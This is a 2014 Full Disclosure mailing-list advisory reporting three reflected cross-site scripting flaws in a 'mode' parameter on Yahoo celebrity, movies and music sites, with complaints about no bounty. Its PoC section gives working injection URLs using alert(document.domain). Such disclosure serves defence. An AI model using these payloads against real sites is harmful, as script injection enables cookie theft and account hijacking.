Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
From: Stefan Schurtz <sschurtz () t-online de>
Date: Sat, 08 Mar 2014 11:27:05 +0100


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory:                    Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID:               SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author:                       Stefan Schurtz
Affected Software:    Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL:               http://yahoo.com/
Vendor Status:          Not tested anymore
Bounty:                      nothing
 
==========================
Vulnerability Description
==========================
 
The 'mode'-Paramter on "https://celebrity.yahoo.com/";,
"https://movies.yahoo.com/";, "https://music.yahoo.com/"; is prone to a
Cross-site Scripting vulnerability
 
==========================
PoC-Exploit
==========================
 
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================
 
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----

Attachment: 0x62DC6CC0.asc
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities Stefan Schurtz (Mar 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]